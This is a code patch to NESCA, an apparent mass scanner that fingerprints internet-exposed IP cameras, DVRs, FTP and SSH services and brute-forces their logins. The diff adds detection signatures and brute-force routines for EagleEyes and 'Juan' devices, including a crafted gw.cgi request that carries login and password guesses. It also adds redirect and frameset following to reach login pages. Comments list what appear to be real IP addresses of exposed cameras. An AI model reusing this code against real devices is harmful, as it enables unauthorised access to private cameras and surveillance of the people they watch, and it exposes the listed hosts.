From f1d0e32ed503cefb0e0c58a0dc0f66a5f65df273 Mon Sep 17 00:00:00 2001 From: cora32 Date: Sun, 30 Aug 2015 17:40:00 +0300 Subject: [PATCH] Multiple fixes --- Connector.cpp | 27 +++-- IPCAuth.cpp | 10 ++ Utils.h | 2 + finder.cpp | 299 ++++++++++++++++++++++++++++++++++++++++++------ mainResources.h | 2 +- nesca_3.cpp | 53 +++++---- 6 files changed, 327 insertions(+), 66 deletions(-) diff --git a/Connector.cpp b/Connector.cpp index 4c79549..962db0e 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -202,15 +202,23 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); Activity += sz; return sz; - } else { + } + else if (res == CURLE_LOGIN_DENIED && port == 21) { + return -1; + } + else if (res == CURLE_OPERATION_TIMEDOUT + || res == CURLE_COULDNT_CONNECT + || res == CURLE_SEND_ERROR + || res == CURLE_RECV_ERROR + ) { + return -1; + } + else { if (res == 6) return -2; - else if (res != 28 && - res != 7 && - res != 13 && + else if (res != 13 && res != 67 && res != 52 && res != 56 && - res != 55 && res != 35 && res != 19 && res != 23) @@ -234,10 +242,11 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, QString(ip) + ":" + QString::number(port)); }; - if (res == 23 && sz > 0) { - return sz; - } - else return -1; + //if (res == 23 && sz > 0) { + // return sz; + //} + return sz; + //else return -1; } if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); diff --git a/IPCAuth.cpp b/IPCAuth.cpp index 9f8e09c..ad98aa8 100644 --- a/IPCAuth.cpp +++ b/IPCAuth.cpp @@ -79,6 +79,10 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) { negVector.push_back("/error.asp"); } + else if (strcmp(SPEC, "JUAN") == 0) + { + negVector.push_back("errno=\"4\""); + } else { stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); @@ -174,6 +178,12 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) sprintf(request, "%s:%d/webs/httplogin?username=%s&password=%s&UserID=45637757", ip, port, login, pass); } + else if (strcmp(SPEC, "JUAN") == 0) + { + //sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=&_=1450923182693", + sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693", + ip, port, login, pass); + } std::string buffer; Connector con; diff --git a/Utils.h b/Utils.h index beb2002..99cef40 100644 --- a/Utils.h +++ b/Utils.h @@ -7,6 +7,8 @@ #include #include +#define STRSTR(buff, str) Utils::ustrstr(buff, str) + using namespace std; template diff --git a/finder.cpp b/finder.cpp index 4ffdfe2..65f0254 100644 --- a/finder.cpp +++ b/finder.cpp @@ -418,7 +418,15 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const && Utils::ustrstr(buffcpy, "jsmain/liveview.js") != -1 ) return 54; //Beward (http://46.146.243.88:88/login.asp) if (Utils::ustrstr(buffcpy, "get_status.cgi") != -1 - && Utils::ustrstr(buffcpy, "str_device+") != -1) return 55; //QCam (http://1.177.123.118:8080/) + && Utils::ustrstr(buffcpy, "str_device+") != -1 + ) return 55; //QCam (http://1.177.123.118:8080/) + if (Utils::ustrstr(buffcpy, "EagleEyes") != -1 + && (Utils::ustrstr(buffcpy, "/Login.cgi?rnd=") != -1 + || Utils::ustrstr(buffcpy, "mobile480.htm") != -1) + ) return 56; //EaglesEye (http://203.190.113.34:88/nobody/mobile480.htm) + if (Utils::ustrstr(buffcpy, "dvr_remember") != -1 + && Utils::ustrstr(buffcpy, "login_chk_usr_pwd") != -1 + ) return 57; //Network video client (http://203.190.113.54:60001/) if(((Utils::ustrstr(buffcpy, "220") != -1) && (port == 21)) || (Utils::ustrstr(buffcpy, "220 diskStation ftp server ready") != -1) || @@ -428,7 +436,6 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const if (Utils::ustrstr(buffcpy, "camera") != -1 || Utils::ustrstr(buffcpy, "webcamxp") != -1 || - Utils::ustrstr(buffcpy, "video") != -1 || Utils::ustrstr(buffcpy, "ipcam") != -1 || Utils::ustrstr(buffcpy, "smart ip") != -1 || Utils::ustrstr(buffcpy, "sanpshot_icon") != -1 || @@ -2408,43 +2415,194 @@ std::string getTitle(const char *str, const int flag) { }; }; } - else if ((ptr1 = strstri(str, "")) != NULL) { + + if ((ptr1 = strstri(str, "")) != NULL) { char *ptr2 = strstri(ptr1, ""); - int sz = ptr2 - ptr1; + if (NULL != ptr2) { + int sz = ptr2 - ptr1; - strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + if (ptr1 + 6 == ptr2) { + strcat(finalstr, "[Empty body]"); + } + else { + strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + } + } + else { + strcat(finalstr, "No closing tag detected."); + } } else if ((ptr1 = strstri(str, "")) != NULL) { char *ptr2 = strstri(ptr1, ""); - int sz = ptr2 - ptr1; + if (NULL != ptr2) { + int sz = ptr2 - ptr1; - strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + } + else { + strcat(finalstr, "No closing tag detected."); + } } else if ((ptr1 = strstri(str, "\r\n\r\n")) != NULL) { strncat(finalstr, ptr1 + 4, 128); } + else { + strncat(finalstr, str, strlen(str)); + } std::string result = ""; - if (flag == 1) { - result = "[PK]"; - } - - result += std::string(finalstr); - return result; -} -std::string getHeader(const std::string *buffcpy, const int flag) { - std::string &result = getTitle(buffcpy->c_str(), flag); - - if (result.size() == 0) { - if (Utils::ustrstr(buffcpy, "redir") != std::string::npos) { - result += "[R]"; - }; - //result += "[Ξ]"; - result += buffcpy->substr(0, 128); + if (flag == 1) { + result = "[PK]"; } + result += std::string(finalstr); return result; } +bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) { + if (NULL == buff || 0 == buff->size()) { + return false; + } + + if (counter->iterationCount > 2) { + stt->doEmitionFoundData(QString(ip) + ":" + QString::number(port) + " - infinite loop detected."); + return true; + } + + std::string buffcpy = *buff; + int pos = STRSTR((const std::string *) &buffcpy, "http-equiv=\"refresh\""); + if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "http-equiv=refresh"); + if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "http-equiv='refresh'"); + if (-1 == pos) { + return false; + } + + const std::string tempString = buffcpy.substr(pos + 17); + + int urlPos = STRSTR(&tempString, "url="); + int delimPosFirst = tempString.find_first_of(" \n>\"'", urlPos); + int delimPosSecond = tempString.find_first_of(" \n>\"'", delimPosFirst); + + std::string location; + if (delimPosFirst == delimPosSecond) { + location = tempString.substr(urlPos + 4, delimPosFirst - (urlPos + 4)); + } + else { + location = tempString.substr(delimPosFirst + 1, delimPosSecond); + } + + Connector con; + int newPort = port; + if (location[0] == '/') { + std::string tIP = std::string(ip) + location; + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(tIP.c_str())); + con.nConnect(location.c_str(), port, &buffcpy); + } + else if (-1 != STRSTR(location, "http://")) { + int httpProto = STRSTR(location, "http://"); + + int portPos = location.find(":", 7); + if (-1 != portPos) { + int portPosEnd = location.find("/ \n>\"'", portPos + 7); + newPort = std::stoi(location.substr(portPos + 1, portPosEnd)); + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), newPort, &buffcpy); + } + else { + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), port, &buffcpy); + } + } + else if (-1 != STRSTR(location, "https://")) { + int httpProto = STRSTR(location, "https://"); + + int portPos = location.find(":", 8); + if (-1 != portPos) { + int portPosEnd = location.find("/ \n>\"'", portPos + 8); + newPort = std::stoi(location.substr(portPos + 1, portPosEnd)); + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), newPort, &buffcpy); + } + else { + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), 443, &buffcpy); + } + } + else { + std::string tIP = std::string(ip) + (location[0] == '/' ? "" : "/") + location; + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(tIP.c_str())); + con.nConnect(tIP.c_str(), port, &buffcpy); + } + + ++counter->iterationCount; + + + if (equivRedirectHandler(&buffcpy, ip, newPort, counter)) { + *buff = buffcpy; + } + + return buff->size() > 0; +} +bool jsRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) { + if (NULL == buff || 0 == buff->size()) { + return false; + } + + if (counter->iterationCount > 2) { + stt->doEmitionFoundData(QString(ip) + ":" + QString::number(port) + " - infinite loop detected."); + return true; + } + + std::string buffcpy = *buff; + + int pos = STRSTR((const std::string *) &buffcpy, "location.href ="); + if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "location.href="); + if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "location.replace"); + if (-1 == pos) { + return false; + } + + int eqPos = buffcpy.find_first_of("=(", pos); + int spacePosFirst = buffcpy.find_first_not_of(" ", eqPos); + int spacePosSecond = buffcpy.find_first_of(");", spacePosFirst); + std::string subRedirect = buffcpy.substr(spacePosFirst + 1, spacePosSecond - spacePosFirst - 1); + int quotePosFirst = subRedirect.find_first_of("\"'"); + if (-1 == quotePosFirst) { + return false; + } + int quotePosSecond = subRedirect.find_first_of("\"'", quotePosFirst + 1); + + std::string subLocation = subRedirect.substr(quotePosFirst + 1, quotePosSecond - quotePosFirst - 1); + std::string location = std::string(ip) + (subLocation[0] == '/' ? "" : "/") + subLocation; + + Connector con; + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), port, &buffcpy); + + ++counter->iterationCount; + + if (jsRedirectHandler(&buffcpy, ip, port, counter)) { + *buff = buffcpy; + } + + return buff->size() > 0; +} +std::string getHeader(const std::string *buffcpy, const int flag) { + if (STRSTR(buffcpy, "c_str(), flag); + + if (result.size() == 0) { + if (Utils::ustrstr(buffcpy, "redir") != std::string::npos) { + result += "[R]"; + }; + //result += "[Ξ]"; + result += buffcpy->substr(0, 128); + } + return result; + } +} #define RVI_START_FILE "\n\t\n\t\t" void parseFlag(int flag, char* ip, int port, int size, const std::string &header, char* cp) { @@ -2533,7 +2691,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header char fileName[256] = { 0 }; char date[64] = { 0 }; strcpy(date, Utils::getStartDate().c_str()); - if (HikVis::hikCounter >= 256) { + if (HikVis::hikCounter >= 255) { HikVis::hikCounter = 0; HikVis::hikPart++; } @@ -2567,7 +2725,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header char fileName[256] = { 0 }; char date[64] = { 0 }; strcpy(date, Utils::getStartDate().c_str()); - if (HikVis::rviCounter >= 256) { + if (HikVis::rviCounter >= 255) { HikVis::rviCounter = 0; HikVis::rviPart++; } @@ -2776,6 +2934,14 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header { _specBrute(ip, port, "IP Camera", flag, "/videostream.cgi", "Basic Authorization", cp, size); } + else if (flag == 56) //EaglesEye + { + _specBrute(ip, port, "IP Camera", flag, "/Login.cgi?rnd=000148921789481", "Basic Authorization", cp, size); + } + else if (flag == 57) //Juan + { + _specWEBIPCAMBrute(ip, port, "[JUAN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JUAN"); + } else if (flag == 20) //AXIS Camera { if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) { @@ -2846,26 +3012,95 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header // putInFile(flag, ip, port, size, finalstr, cp); //}; } -int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lexems *lx) +void handleRedirects(std::string *buffcpy, char* ip, int port) { + + Lexems counter; + counter.iterationCount = 0; + equivRedirectHandler(buffcpy, ip, port, &counter); + counter.iterationCount = 0; + jsRedirectHandler(buffcpy, ip, port, &counter); +} +int handleFramesets(std::string *buffcpy, char* ip, int port, int flag) { + if (NULL == buffcpy || 0 == buffcpy->size()) { + return flag; + } + + int pos; + if ((pos = STRSTR((const std::string *) buffcpy, "find("find("find(">", framePos); + + std::string frameString = buffcpy->substr(framePos, framePosEnd - framePos); + + int frameSrcPos = frameString.find("src"); + if (-1 == frameSrcPos) { + frameSrcPos = frameString.find("SRC"); + } + if (-1 != frameSrcPos) { + int eqPos = frameString.find_first_of("=", frameSrcPos); + if (-1 != eqPos) { + int quotePos1 = frameString.find_first_of("\"'", eqPos); + if (-1 != quotePos1) { + int quotePos2 = frameString.find_first_of("\"'", quotePos1 + 1); + + if (quotePos1 != quotePos2) { + std::string location = frameString.substr(quotePos1 + 1, quotePos2 - quotePos1 - 1); + std::string tIP = std::string(ip) + (location[0] == '/' ? "" : "/") + location; + std::string buff; + int sz = con.nConnect(tIP.c_str(), port, &buff); + int flg = contentFilter((const std::string *) &buff, port, ip, "UTF-8", sz); + if (flg == -1) { + return -1; + } + } + } + } + } + } + } + return flag; +} +int Lexems::filler(char* ip, int port, std::string *buffcpy, int size, Lexems *lx) { if (port == 22) { _saveSSH(ip, 22, size, buffcpy->c_str()); return -1; - } else if (Utils::ustrstr(buffcpy, "SSH-2.0-OpenSSH") != -1 || - Utils::ustrstr(buffcpy, "SSH-2.0-mod_sftp") != -1) { + } + else if (Utils::ustrstr((const std::string *) buffcpy, "SSH-2.0-OpenSSH") != -1 || + Utils::ustrstr((const std::string *) buffcpy, "SSH-2.0-mod_sftp") != -1) { std::string sshBuff; int res = SSHAuth::SSHLobby(ip, port, &sshBuff); if (res != -1 && res != -2) _saveSSH(ip, port, size, (char*)sshBuff.c_str()); return -1; }; + handleRedirects(buffcpy, ip, port); + char cp[32] = { 0 }; strncpy(cp, getCodePage(buffcpy->c_str()), 32); - int flag = contentFilter(buffcpy, port, ip, cp, size); + int flag = contentFilter((const std::string *) buffcpy, port, ip, cp, size); if (flag != -1) { - const std::string &header = getHeader(buffcpy, flag); - - parseFlag(flag, ip, port, size, header, cp); + if (flag < 2 || flag > 6) { + const std::string &header = getHeader((const std::string *) buffcpy, flag); + if ((flag = handleFramesets(buffcpy, ip, port, flag)) == -1) { + return -1; + } + parseFlag(flag, ip, port, size, header, cp); + } + else { + parseFlag(flag, ip, port, size, "", cp); + } return flag; } else { diff --git a/mainResources.h b/mainResources.h index 54a4859..37715e9 100644 --- a/mainResources.h +++ b/mainResources.h @@ -188,7 +188,7 @@ public: int filler(char* ip, int port, - const std::string *buffcpy, + std::string *buffcpy, int size, Lexems *lx); }; diff --git a/nesca_3.cpp b/nesca_3.cpp index 0c0ebf8..4861488 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp @@ -2159,31 +2159,36 @@ QList setRow(QString ip, QString loginPass, QString percentage) std::atomic isBAModelLocked = false; int nesca_3::addBARow(QString ip, QString loginPass, QString percentage) { if (!globalScanFlag) return -1; - while (isBAModelLocked) Sleep(10); - isBAModelLocked = true; - BAModel->appendRow(setRow(ip, loginPass, percentage)); - int index = BAModel->rowCount() - 1; - isBAModelLocked = false; + if (BALogSwitched) { + while (isBAModelLocked) Sleep(10); + isBAModelLocked = true; + BAModel->appendRow(setRow(ip, loginPass, percentage)); + int index = BAModel->rowCount() - 1; + isBAModelLocked = false; - if (percentage.compare("OK") == 0) { - BAModel->setData(BAModel->index(index, 0), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); - BAModel->setData(BAModel->index(index, 1), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); - BAModel->setData(BAModel->index(index, 2), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); + if (percentage.compare("OK") == 0) { + BAModel->setData(BAModel->index(index, 0), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); + BAModel->setData(BAModel->index(index, 1), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); + BAModel->setData(BAModel->index(index, 2), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); - BAModel->item(index, 0)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); - BAModel->item(index, 1)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); - BAModel->item(index, 2)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 0)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 1)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 2)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + } + else if (percentage.contains("FAIL") || percentage.contains("404")) { + BAModel->setData(BAModel->index(index, 0), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); + BAModel->setData(BAModel->index(index, 1), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); + BAModel->setData(BAModel->index(index, 2), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); + + BAModel->item(index, 0)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 1)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 2)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + } + return index; } - else if (percentage.contains("FAIL") || percentage.contains("404")) { - BAModel->setData(BAModel->index(index, 0), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); - BAModel->setData(BAModel->index(index, 1), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); - BAModel->setData(BAModel->index(index, 2), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); - - BAModel->item(index, 0)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); - BAModel->item(index, 1)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); - BAModel->item(index, 2)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + else { + return 0; } - return index; } void nesca_3::slotChangeBARow(int rowIndex, QString loginPass, QString percentage) { QModelIndex index = BAModel->index(rowIndex, 1, QModelIndex()); @@ -3132,9 +3137,9 @@ void nesca_3::finishLoading() { CreateVerFile(); - //dtHN->start(); - //dtME2->start(); - //adtHN->start(); + dtHN->start(); + dtME2->start(); + adtHN->start(); #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)